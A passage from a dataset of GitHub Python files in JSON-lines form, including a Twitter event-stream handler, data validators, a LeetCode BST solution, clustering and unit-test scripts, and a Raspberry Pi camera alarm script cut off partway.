event=event, prefix=prefix, **values)\n\n return event_handler\n\n return decorator\n\n\nclass EventStream(abc.ABC):\n def __init__(self, client):\n self._client = client\n self.functions = [\n getattr(self, func) for func in dir(self) if self._check(func)\n ]\n\n self.functions.sort(key=lambda i: getattr(i.is_event, \"priority\", 0))\n\n def __getitem__(self, key):\n return self._client[key]\n\n def __getattr__(self, key):\n return getattr(self._client, key)\n\n @abc.abstractmethod\n def stream_request(self):\n pass\n\n async def start(self):\n if callable(self.stream_request):\n stream_request = self.stream_request()\n else:\n stream_request = self.stream_request\n\n while True:\n async with stream_request as resource:\n async for data in resource:\n try:\n await self._run(data)\n except Exception:\n msg = \"error in %s._start:\\n\" % self.__class__.__name__\n peony.utils.log_error(msg)\n\n def _check(self, func):\n if not func.startswith(\"_\"):\n return isinstance(getattr(self, func), EventHandler)\n else:\n return False\n\n def _get(self, data):\n for event_handler in self.functions:\n argcount = len(peony.utils.get_args(event_handler.is_event))\n args = [data, self._client][:argcount]\n if event_handler.is_event(*args):\n return event_handler\n\n async def _run(self, data):\n event_handler = self._get(data)\n\n if event_handler:\n coro = event_handler(self, data)\n try:\n return await peony.utils.execute(coro)\n except Exception:\n fmt = \"error occurred while running {classname}.{handler}:\"\n msg = fmt.format(\n classname=self.__class__.__name__, handler=event_handler.__name__\n )\n\n peony.utils.log_error(msg)\n\n\nclass EventStreams(list):\n def __init__(self):\n super().__init__()\n self.is_setup = False\n\n def check_setup(self, client):\n if not self.is_setup:\n self.setup(client)\n\n def get_tasks(self, client):\n self.check_setup(client)\n return [client.loop.create_task(stream.start()) for stream in self]\n\n def get_task(self, client):\n self.check_setup(client)\n if len(self) == 1:\n return client.loop.create_task(self[0].start())\n elif self:\n raise RuntimeError(\"more than 1 event stream\")\n else:\n raise RuntimeError(\"no event stream\")\n\n def setup(self, client):\n for i in range(len(self)):\n self[i] = self[i](client=client)\n\n self.is_setup = True\n","repo_name":"odrling/peony-twitter","sub_path":"peony/commands/event_handlers.py","file_name":"event_handlers.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"19"} +{"seq_id":"9337409996","text":"import os\nimport re\nimport sys\n\n\ndef query_yes_no(question, default=\"yes\"):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is one of \"yes\" or \"no\".\n \"\"\"\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\n\n\n# http://stackoverflow.com/a/3167684\ndef splitPath(path):\n folders = []\n\n while 1:\n path, folder = os.path.split(path)\n if folder != '':\n folders.append(folder)\n else:\n if path != '':\n folders.append(path)\n break\n\n folders.reverse()\n return folders\n\n\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\n\n\ndef natural_keys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split('(\\d+)', text) ]\n","repo_name":"jsza/getoverhere","sub_path":"getoverhere/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11410660338","text":"def is_palindroom(woord):\n uitk = True\n if len(woord) == 1:\n uitk = True\n else:\n for i in range(0, len(woord)//2):\n if woord[i] == woord[len(woord)-1-i] and uitk != False:\n uitk = True\n else:\n uitk = False\n return uitk\n\nprint(is_palindroom('tarwerat'))\n\n","repo_name":"alyssaschaubroeck/Informatica5","sub_path":"10 - Strings/Palindroom.py","file_name":"Palindroom.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40163806555","text":"import argparse\nimport Evaluator\n\nparser = argparse.ArgumentParser(prog=\"CMA-ES\",\n description='This program allows you to run CMA-ES')\n\nparser.add_argument('-m', '--mode', type=str, default='normal',\n help='Program mode. Normal will run default CMA-ES implementation, while \\'mean_all\\' and '\n '\\'mean_selected\\' will run algorithm with modification adding a mean point to the '\n 'population, calculated respectively either from whole population all best percentage of it.',\n choices=['normal', 'mean_all', 'mean_selected'])\n\nparser.add_argument('-i', '--iterations', type=int, default=100,\n help='How many times the algorithm should be run.')\n\nparser.add_argument('-fr', '--frequency', type=int, default=1,\n help='How many iteration apart should modification of the algorithm take place.'\n 'Ignored if \\'normal\\' mode is selected')\n\nparser.add_argument('-f', '--functions', nargs='+',\n help='Objective functions to be used for the algorithm. '\n 'Results from all objective functions are averaged.',\n choices=['felli', 'quadratic', 'bent', 'rastrigin', 'rosenbrock'])\n\nparser.add_argument('-d', '--dimensions', type=int, default=10,\n help='Number of dimensions.')\n\nparser.add_argument('-l', '--lbd', type=int, default=100,\n help='Population size.')\n\nparser.add_argument('-t', '--test_case', type=str, default='all',\n help='Which previously prepared test case to run.',\n choices=['selected_frequency', 'all_frequency', 'modifications', 'all', 'custom'])\n\nif __name__ == '__main__':\n args = parser.parse_args()\n if args.test_case == 'selected_frequency':\n Evaluator.selected_frequency_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'all_frequency':\n Evaluator.all_frequency_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'modifications':\n Evaluator.modifications_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'all':\n Evaluator.all_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'custom':\n Evaluator.custom_test(dimensions=args.dimensions, frequency=args.frequency, objectives=args.functions,\n iterations=args.iterations, mode=args.mode, lambda_arg=args.lbd)\n","repo_name":"michalurb8/AMHE-CMA-ES","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14586320920","text":"from util.zipper import Zipper\nimport datetime\nfrom ocgis import env\nfrom django.http import HttpResponse\nfrom urlparse import parse_qs\nimport util.parms as parms\nimport exc\nfrom ocgis.exc import InterpreterNotRecognized\nfrom ocgis.api.interpreter import Interpreter, OcgInterpreter\nfrom ocgis.api.operations import OcgOperations\nfrom ocgis.api.definition import OcgParameter\nfrom ocgis.util.helpers import reduce_query\n\n\ndef _zip_response_(path,filename=None):\n zip_stream = Zipper(path).get_zip_stream()\n if filename is None:\n dt = str(datetime.datetime.utcnow())\n dt = dt.replace('-','')\n dt = dt.replace(' ','_')\n dt = dt.split('.')[0]\n dt = dt.replace(':','')\n filename = '{1}_{0}.zip'.format(dt,env.PREFIX)\n resp = HttpResponse(zip_stream,mimetype='application/zip')\n resp['Content-Disposition'] = 'attachment; filename={0}'.format(filename)\n resp['Content-length'] = str(len(zip_stream))\n return(resp)\n\ndef _get_query_dict_(request):\n query = parse_qs(request.META['QUERY_STRING'])\n return(query)\n\ndef _get_uri_(query,scalar=False):\n try:\n uri = parms.UidParm(query,'uid',scalar=scalar)\n except exc.QueryParmError:\n uri = parms.UriParm(query,'uri',scalar=scalar)\n return(uri)\n\ndef _get_interface_overload_(query):\n mmap = {'s_proj4':None,\n 's_abstraction':None,\n 't_calendar':None,\n 't_units':None}\n \n name_map = {}\n \n for key,value in mmap.iteritems():\n qp = parms.QueryParm(query,key,scalar=True)\n if value is None:\n value = key\n name_map.update({value:qp.value})\n \n return(name_map)\n \ndef _get_interpreter_return_(ops):\n try:\n interp = Interpreter.get_interpreter(ops)\n except InterpreterNotRecognized:\n interp = OcgInterpreter(ops)\n ret = interp.execute()\n return(ret)\n\ndef _get_operations_(request):\n ## parse the query string\n query = parse_qs(request.META['QUERY_STRING'])\n ## reduce to pull together possible multiple arguments for dataset request\n query = reduce_query(query)\n ## construction the operations objects\n ops = OcgOperations.parse_query(query)\n \n return(ops)\n \n# ## get dataset information\n# uri = _get_uri_(query)\n# variable = parms.OcgQueryParm(query,'variable',nullable=False)\n# dataset = []\n# if len(uri.value) < len(variable.value):\n# for u in uri:\n# for v in variable:\n# dataset.append({'uri':u,'variable':v})\n# elif len(variable.value) < len(uri.value):\n# if len(variable.value) > 1:\n# raise(NotImplementedError)\n# else:\n# dataset.append({'uri':uri.value,'variable':variable.value[0]})\n# else:\n# for u,v in zip(uri,variable):\n# dataset.append({'uri':u,'variable':v})\n# \n# ## initialize initial operations object\n# ops = OcgOperations(dataset=dataset)\n# \n# ## iterate objects parsing the query dictionary\n# for value in ops.__dict__.itervalues():\n# if isinstance(value,OcgParameter) and value.name != 'dataset':\n# value.parse_query(query)\n# \n# ## pull interface overload information\n# ops.interface = _get_interface_overload_(query)\n# \n# ## add request specific values\n# ops.request_url = request.build_absolute_uri()\n#\n# return(ops)","repo_name":"doutriaux1/ocgis","sub_path":"src/django/openclimategis/util/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"37567225037","text":"import collections\nimport bisect\nimport sys\ninput = sys.stdin.readline\n\n\ndef inp():\n return(int(input()))\ndef inlt():\n return(list(map(int,input().split())))\ndef insr():\n s = input()\n return(list(s[:len(s) - 1]))\ndef invr():\n return(map(int,input().split()))\n\n\nif __name__ == '__main__':\n n, m = inlt()\n parents = [i for i in range(n)]\n rank = [1 for i in range(n)]\n edges = []\n\n for i in range(m):\n x, y, z = inlt()\n edges.append([z, x, y])\n\n edges.sort()\n\n def find(x):\n if x != parents[x]:\n parents[x] = find(parents[x])\n return parents[x]\n\n def union(a, b):\n a = find(a)\n b = find(b)\n\n if rank[a] == rank[b]:\n rank[a] += 1\n elif rank[b] > rank[a]:\n a, b = b, a\n\n parents[b] = a\n\n res = 0\n edges_add = 0\n for z, x, y in edges:\n if find(x) != find(y):\n union(x, y)\n res = z\n edges_add += 1\n if edges_add == n-1:\n break\n\n print(res)\n\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/cs218_22fall/add_oil.py","file_name":"add_oil.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15044339074","text":"import string\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import NewType\nfrom typing import Optional\nfrom typing import Set\nfrom typing import Type\nfrom typing import Union\n\nfrom cdh_core_api.api.validation import field\nfrom cdh_core_api.api.validation import register_for_type\nfrom cdh_core_api.validation.abstract import InvalidType\nfrom cdh_core_api.validation.abstract import StringValidator\nfrom marshmallow import fields\nfrom marshmallow import validate\nfrom marshmallow.validate import Validator\n\nfrom cdh_core.entities.dataset import DatasetId\nfrom cdh_core.entities.dataset import DatasetTags\nfrom cdh_core.entities.dataset import SourceIdentifier\nfrom cdh_core.entities.dataset import SupportGroup\n\n\ndef generate_string_validation_field(\n validator: Union[Validator, Callable[[Any], Any]], default_metadata: Optional[Dict[str, Any]] = None\n) -> Type[fields.String]:\n \"\"\"Generate a marshmallow Field that can be used in conjunction with register_for_type.\"\"\"\n\n class _BaseValidationField(fields.String):\n def __init__(self, **kwargs: Any):\n if \"metadata\" not in kwargs and default_metadata is not None:\n kwargs[\"metadata\"] = default_metadata\n super().__init__(validate=validator, **kwargs)\n\n return _BaseValidationField\n\n\nvalidate_dataset_id = StringValidator(\n min_length=5,\n max_length=255,\n characters=string.ascii_lowercase + string.digits + \"_\",\n characters_description=\"ASCII letters, digits and _\",\n)\n\nDatasetIdField = generate_string_validation_field(\n validator=validate_dataset_id,\n default_metadata={\n \"description\": \"ID of the dataset\",\n \"example\": \"hr_data_src\",\n },\n)\nregister_for_type(DatasetId)(DatasetIdField)\n\n\ndef get_short_string_validator(allow_empty: bool = False) -> StringValidator:\n \"\"\"Build a validator for a short string attribute.\"\"\"\n return StringValidator(\n min_length=0 if allow_empty else 1,\n max_length=255,\n characters=string.ascii_letters + string.digits + \"_-:\",\n characters_description=\"ASCII letters, digits, _, -, and :\",\n )\n\n\nDeletableSupportGroup = NewType(\"DeletableSupportGroup\", SupportGroup)\nregister_for_type(SupportGroup)(generate_string_validation_field(validator=get_short_string_validator()))\nregister_for_type(DeletableSupportGroup)(generate_string_validation_field(validator=get_short_string_validator(True)))\n\nDATASET_SOURCE_IDENTIFIER_METADATA = {\"description\": \"ID of the data source system.\"}\nDeletableSourceIdentifier = NewType(\"DeletableSourceIdentifier\", SourceIdentifier)\nregister_for_type(SourceIdentifier)(\n generate_string_validation_field(\n validator=get_short_string_validator(), default_metadata=DATASET_SOURCE_IDENTIFIER_METADATA\n )\n)\nregister_for_type(DeletableSourceIdentifier)(\n generate_string_validation_field(\n validator=get_short_string_validator(True), default_metadata=DATASET_SOURCE_IDENTIFIER_METADATA\n )\n)\n\nvalidate_tag_key = StringValidator(\n min_length=1,\n max_length=45,\n characters=string.ascii_lowercase + string.digits + \"-\",\n characters_description=\"lowercase ASCII letters, digits, and -\",\n)\n\nvalidate_tag_value = StringValidator(\n min_length=1,\n max_length=100,\n characters=string.ascii_letters + string.digits + \"-\" + \" \" + \"&\",\n characters_description=\"ASCII letters, digits, space, &, and -\",\n)\n\n\n@register_for_type(DatasetTags)\nclass DatasetTagsField(fields.Dict):\n \"\"\"Validates dataset tags.\"\"\"\n\n def __init__(self, **kwargs: Any):\n super().__init__(\n keys=fields.String(validate=validate_tag_key), values=fields.String(validate=validate_tag_value), **kwargs\n )\n\n\nDATASET_LABELS_DESCRIPTION = (\n \"Can be used to track the legal entities or markets from which the contained data originates.\"\n)\n\n\ndef dataset_labels_field(**kwargs: Any) -> Any:\n \"\"\"Return a dataclasses.Field instance with the relevant metadata for the dataset_label.\"\"\"\n return field(\n default=None,\n metadata={\n \"marshmallow_field\": fields.List(\n fields.Str(validate=validate_dataset_label),\n required=False,\n validate=validate.Length(max=100),\n metadata={\n \"description\": DATASET_LABELS_DESCRIPTION,\n },\n ),\n },\n **kwargs,\n )\n\n\nvalidate_dataset_name = StringValidator(\n min_length=3,\n max_length=20,\n characters=string.ascii_lowercase + string.digits + \"_\",\n characters_description=\"lowercase ASCII letters, digits, and underscores\",\n)\nvalidate_dataset_friendly_name = StringValidator(\n min_length=1,\n max_length=40,\n characters=string.ascii_letters + string.digits + \"_- \",\n characters_description=\"ASCII letters, digits, spaces, -, and _\",\n)\nvalidate_dataset_description = StringValidator(min_length=5, max_length=1000, allow_newlines=True)\n# maximum item size: 400KB (https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Limits.html)\n# utf-8 characters need between 1 and 4 byte each\nvalidate_dataset_documentation = StringValidator(max_length=50_000, allow_newlines=True)\nvalidate_dataset_label = StringValidator(\n min_length=1,\n max_length=100,\n characters=string.ascii_letters + string.digits + \"_\",\n characters_description=\"ASCII letters, digits, and _\",\n)\n\n\ndef validate_dataset_lineage(lineage: object) -> Set[DatasetId]:\n \"\"\"Validate the dataset_lineage.\"\"\"\n if not isinstance(lineage, set):\n raise InvalidType(type(lineage), set)\n for dataset_id in lineage:\n validate_dataset_id(dataset_id)\n return lineage\n","repo_name":"SeaJean123/cdh_test","sub_path":"src/lambdas/cdh_core_api/cdh_core_api/validation/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38601949591","text":"import os\nfrom importlib.metadata import version\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom PyQt5.QtCore import QProcess\n\n\nclass Model(QObject):\n current_path_changed = pyqtSignal(str)\n file_path_changed = pyqtSignal(str)\n is_file_modified_changed = pyqtSignal(bool)\n onemodel_cli_read = pyqtSignal(str)\n\n def __init__(self):\n super().__init__()\n # Current working path of the app.\n self._current_path = QtCore.QDir.homePath()\n #self._current_path += '/Sync/python/workspace/onemodel/examples'\n os.chdir(self._current_path)\n\n # Current open file in the text editor.\n # If None, we don't have a file (or creating new).\n self._file_path = None\n\n # Is current open file modified by the text editor?\n self._is_file_modified = False\n\n # Process which will execute onemodel-cli.\n self._onemodel_cli = QProcess()\n self._onemodel_cli.setProcessChannelMode(QProcess.MergedChannels)\n self._onemodel_cli.readyRead.connect(self.on_onemodel_cli_read)\n\n # Version of the onemodel package.\n self.version = version('onemodel')\n\n @property\n def current_path(self):\n return self._current_path\n\n @current_path.setter\n def current_path(self, value):\n # Save new current_path.\n self._current_path = value\n\n # Change the working path of the app.\n os.chdir(value)\n\n # Update in model is reflected in view by sending a signal to view.\n self.current_path_changed.emit(value)\n\n @property\n def file_path(self):\n return self._file_path\n\n @file_path.setter\n def file_path(self, value):\n self._file_path = value\n self.file_path_changed.emit(value)\n self.is_file_modified = False\n\n @property\n def is_file_modified(self):\n return self._is_file_modified\n\n @is_file_modified.setter\n def is_file_modified(self, value):\n self._is_file_modified = value\n self.is_file_modified_changed.emit(value)\n\n def on_onemodel_cli_read(self):\n text = self._onemodel_cli.readAll().data().decode()\n self.onemodel_cli_read.emit(text)\n","repo_name":"fernandonobel/onemodel-gui","sub_path":"src/onemodel_gui/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39431639737","text":"\"\"\"\r\n450. Delete Node in a BST\r\nMedium\r\n\r\nGiven a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.\r\n\r\nBasically, the deletion can be divided into two stages:\r\n\r\n Search for a node to remove.\r\n If the node is found, delete the node.\r\n\r\nFollow up: Can you solve it with time complexity O(height of tree)?\r\n\r\nExample 1:\r\n\r\nInput: root = [5,3,6,2,4,null,7], key = 3\r\nOutput: [5,4,6,2,null,null,7]\r\nExplanation: Given key to delete is 3. So we find the node with value 3 and delete it.\r\nOne valid answer is [5,4,6,2,null,null,7], shown in the above BST.\r\nPlease notice that another valid answer is [5,2,6,null,4,null,7] and it's also accepted.\r\n\"\"\"\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def deleteNode(self, root: TreeNode, key: int) -> TreeNode:\r\n if not root:\r\n return\r\n\r\n if key == root.val:\r\n \"\"\"\r\n 三种情况:\r\n 1 只有根结点,直接返回;\r\n 2 只有一个子结点,返回子结点;\r\n 3 有两个子结点,为了不破坏结构,需要找到左子树最大结点,或者右子树最小结点替换根结点\r\n \"\"\"\r\n if not root.left:\r\n return root.right\r\n if not root.right:\r\n return root.left\r\n if root.left and root.right:\r\n root.val = self.minVal(root.right)\r\n # print(f\"root.val:{root.val}\")\r\n root.right = self.deleteNode(root.right, root.val)\r\n\r\n elif key < root.val:\r\n # 更新左结点\r\n root.left = self.deleteNode(root.left, key)\r\n\r\n elif key > root.val:\r\n root.right = self.deleteNode(root.right, key)\r\n\r\n return root\r\n\r\n def minVal(self, root: TreeNode) -> int:\r\n while root.left:\r\n root = root.left\r\n return root.val\r\n","repo_name":"klgentle/lc_python","sub_path":"leet_code/labuladong/tree/p0450_Delete_Node_in_a_BST.py","file_name":"p0450_Delete_Node_in_a_BST.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"32693375275","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.cluster import *\nfrom sklearn.neighbors import kneighbors_graph\nfrom sklearn.datasets import make_blobs\n\n\ndef run():\n plt.figure(figsize=(12, 12))\n\n n_samples = 1500\n random_state = 2\n X, yreal = make_blobs(n_samples=n_samples, random_state=random_state)\n bandwidth = estimate_bandwidth(X, quantile=0.3)\n # connectivity matrix for structured Ward\n connectivity = kneighbors_graph(X, n_neighbors=10, include_self=False)\n # make connectivity symmetric\n connectivity = 0.5 * (connectivity + connectivity.T)\n\n y_kmeans = KMeans(n_clusters=3, random_state=random_state).fit_predict(X)\n\n y_meanshift= MeanShift(bandwidth=bandwidth, bin_seeding=True).fit_predict(X)\n\n y_ward = AgglomerativeClustering(n_clusters=3, linkage='ward',\n connectivity=connectivity).fit_predict(X)\n y_spectral = SpectralClustering(n_clusters=3,\n eigen_solver='arpack',\n affinity=\"nearest_neighbors\").fit_predict(X)\n y_dbscan = DBSCAN(eps=0.5).fit_predict(X)\n y_affinity_propagation = AffinityPropagation(damping=.9,\n preference=-500).fit_predict(X)\n\n y_average_linkage = AgglomerativeClustering(\n linkage=\"average\", affinity=\"cityblock\", n_clusters=3,\n connectivity=connectivity).fit_predict(X)\n\n y_birch = Birch(n_clusters=3).fit_predict(X)\n\n plt.subplot(331)\n plt.scatter(X[:, 0], X[:, 1], c=yreal)\n plt.subplot(332)\n plt.scatter(X[:, 0], X[:, 1], c=y_kmeans)\n plt.subplot(333)\n plt.scatter(X[:, 0], X[:, 1], c=y_meanshift)\n plt.subplot(334)\n plt.scatter(X[:, 0], X[:, 1], c=y_ward)\n plt.subplot(335)\n plt.scatter(X[:, 0], X[:, 1], c=y_spectral)\n plt.subplot(336)\n plt.scatter(X[:, 0], X[:, 1], c=y_dbscan)\n plt.subplot(337)\n plt.scatter(X[:, 0], X[:, 1], c=y_affinity_propagation)\n plt.subplot(338)\n plt.scatter(X[:, 0], X[:, 1], c=y_average_linkage)\n plt.subplot(339)\n plt.scatter(X[:, 0], X[:, 1], c=y_birch)\n plt.show()\n\n","repo_name":"qwertylevel3/UPCF","sub_path":"util/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3430234481","text":"import unittest\n\nimport os\nimport sys\n\nsys.path.append(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\"))\nfrom test_utils import TestCasePPAP\n\nfrom copy import deepcopy\nfrom random import uniform\n\nimport numpy as np\n\nfrom ppap4lmp import (\n create, StaCustom, StaMolecules, ProTimeCorrelationInMolecule, execute_omp)\n\nclass TestProTimeCorrelationInMolecule(TestCasePPAP):\n\n base_data = [\n {\"id\": 1, \"mol\": 1, \"xu\": 0.0, \"yu\": 1.0, \"zu\": 2.0},\n {\"id\": 2, \"mol\": 1, \"xu\": 2.0, \"yu\": 1.0, \"zu\": 0.0},\n {\"id\": 3, \"mol\": 1, \"xu\": 1.0, \"yu\": 2.0, \"zu\": 3.0},\n {\"id\": 4, \"mol\": 1, \"xu\": 3.0, \"yu\": 2.0, \"zu\": 1.0},\n {\"id\": 5, \"mol\": 1, \"xu\": 2.0, \"yu\": 3.0, \"zu\": 4.0},\n {\"id\": 6, \"mol\": 1, \"xu\": 4.0, \"yu\": 3.0, \"zu\": 2.0},\n ]\n\n def test_error01(self):\n\n dummy_data = deepcopy(self.base_data)\n\n for i in range(len(dummy_data)):\n del dummy_data[i][\"xu\"]\n\n atomses = [create(StaCustom(dummy_data)) for i in range(10)]\n molses = [create(StaMolecules(atoms)) for atoms in atomses]\n\n pro = ProTimeCorrelationInMolecule(list(zip(molses, atomses)))\n\n self.check_error_msg(\n \"RuntimeError: Missing key(s) 'xu' in ProTimeCorrelationInMolecule\", execute_omp, pro)\n\n def test_error02(self):\n\n atomses = [create(StaCustom(self.base_data)) for i in range(10)]\n molses = [create(StaCustom([{\"id\": 1}])) for i in range(10)]\n\n pro = ProTimeCorrelationInMolecule(list(zip(molses, atomses)))\n\n self.check_error_msg(\n \"RuntimeError: Missing key(s) 'atom-ids' in ProTimeCorrelationInMolecule\", execute_omp, pro)\n\n def test_error03(self):\n\n atoms_traj = []\n base_atoms = deepcopy(self.base_data)\n\n for i in range(2, 12):\n\n atoms_tmp = []\n\n for j in range(1, i):\n\n for k, atom in enumerate(base_atoms):\n atom[\"id\"] = (j-1) * len(base_atoms) + k + 1\n atom[\"mol\"] = j\n\n atoms_tmp.extend(deepcopy(base_atoms))\n\n atoms_traj.append(create(StaCustom(atoms_tmp)))\n\n mols_traj = [create(StaMolecules(atoms)) for atoms in atoms_traj]\n\n pro = ProTimeCorrelationInMolecule(list(zip(mols_traj, atoms_traj)))\n\n self.check_error_msg(\n \"RuntimeError: Number of molecules and molecular types must be unchanged\", execute_omp, pro)\n\n def test_rotate_stick(self):\n\n n_mols = 10\n\n rotate_data = []\n initial_atoms = []\n\n for imol in range(n_mols):\n\n ps = np.random.uniform(-10.0, 10.0, (3,3))\n\n m_point = 0.5 * (ps[0] + ps[1])\n\n cross = np.cross(ps[1] - ps[0], ps[2] - ps[0])\n n_vector = cross / np.linalg.norm(cross)\n\n rotate_data.append({\"normal\": n_vector, \"middle\": m_point})\n\n initial_atoms.extend([\n {\"id\": 2*imol+i+1, \"mol\": imol+1, \"xyz\": ps[i]}\n for i in range(2)\n ])\n\n atoms_traj = []\n\n for i in range(181):\n\n atoms_tmp = deepcopy(initial_atoms)\n\n for atom in atoms_tmp:\n\n m = rotate_data[atom[\"mol\"]-1][\"middle\"]\n n = rotate_data[atom[\"mol\"]-1][\"normal\"]\n\n rotated_xyz = np.array(rot(i, n, atom[\"xyz\"]-m)) + m\n\n atom[\"xu\"] = rotated_xyz[0]\n atom[\"yu\"] = rotated_xyz[1]\n atom[\"zu\"] = rotated_xyz[2]\n\n del atom[\"xyz\"]\n\n atoms_traj.append(create(StaCustom(atoms_tmp)))\n\n mols_traj = [create(StaMolecules(atoms)) for atoms in atoms_traj]\n\n pro = ProTimeCorrelationInMolecule(list(zip(mols_traj, atoms_traj)))\n pro.set_indices(0, 1)\n\n execute_omp(pro)\n\n expects = np.array([np.cos(i*np.pi/180) for i in range(181)])\n\n self.assertTrue(np.allclose(pro.get_time_correlation(), expects))\n\n\n# Functions to rotate a vector via quaternian\n\ndef q_mult(q1, q2):\n\n x1, y1, z1, w1 = q1\n x2, y2, z2, w2 = q2\n\n w = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2\n x = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2\n y = w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2\n z = w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2\n\n return x, y, z ,w\n\ndef q_conjugate(q):\n\n x, y, z ,w = q\n\n return -x, -y, -z, w\n\ndef rot(deg, n, v):\n\n c = np.cos(deg*np.pi/360)\n s = np.sin(deg*np.pi/360)\n\n q1 = [n[0]*s, n[1]*s, n[2]*s, c]\n q2 = list(v) + [0.0]\n\n return q_mult(q_mult(q1, q2), q_conjugate(q1))[:3]\n\nif __name__ == \"__main__\":\n\n suite = unittest.TestSuite()\n\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_error01\"))\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_error02\"))\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_error03\"))\n suite.addTest(TestProTimeCorrelationInMolecule(\"test_rotate_stick\"))\n\n runner = unittest.TextTestRunner()\n runner.run(suite)\n","repo_name":"irisTa56/ppap4lmp","sub_path":"tests/tests_processor/test_ProTimeCorrelationInMolecule.py","file_name":"test_ProTimeCorrelationInMolecule.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"9422037395","text":"#!/usr/bin/env python3\nimport os\nimport time\nimport subprocess\nimport logging\n\nfrom picamera import PiCamera\n\nlogger = logging.getLogger(__name__)\n# Prepare camera\ncamera = PiCamera()\ncamera.rotation = 90\ncamera.brightness = 60\ndef get_file_name(content):\n images_default_path = \"/home/pi/Documents/Alarm/Images/\"\n video_default_path = \"/home/pi/Documents/Alarm/Videos/\"\n file_pattern = time.strftime(\"%H_%M_%S\")\n dir_pattern = time.strftime(\"%d-%m-%Y\")\n content = content.lower()\n\n if content == \"image\":\n dir_name = images_default_path + dir_pattern\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n logger.info (\"Directory for images with current date not found, creating %s\", dir_name)\n\n res_file_name = dir_name + \"/\" + file_pattern + \".png\"\n return res_file_name\n\n elif content == \"video\":\n dir_name = video_default_path + dir_pattern\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n logger.info (\"Directory for videos with current date not found, creating %s\", dir_name)\n\n res_file_name = dir_name + \"/\" + file_pattern + \".h264\"\n return res_file_name\n\n else:\n return None\n\ndef get_encoded_file_name(filename):\n filename = filename.split(\".\")\n filename[1] = \"mp4\"\n res_file_name = \".\".join(filename)\n\n return res_file_name\n\ndef capture_image(count=1):\n files_name_list = []\n\n for i in range(count):\n file_name = get_file_name(\"image\")\n camera.capture(file_name)\n time.sleep(1.5)\n logger.info(\"Captured image: %s\", file_name)\n files_name_list.append(file_name)\n\n return files_name_list\n\n\ndef capture_video(duration=60):\n files_name_list = []\n file_name = get_file_name(\"video\")\n encoded_file_name = get_encoded_file_name(file_name)\n logger.debug(\"encoded file name: %s\", encoded_file_name)\n\n camera.start_recording(file_name)\n time.sleep(duration)\n camera.stop_recording()\n time.sleep(3)\n logger.info (\"captured vidoe: %s\", file_name)\n # Convert from raw h264 to mp4 using gpac package\n try:\n subprocess.check_call([\"MP4Box\", 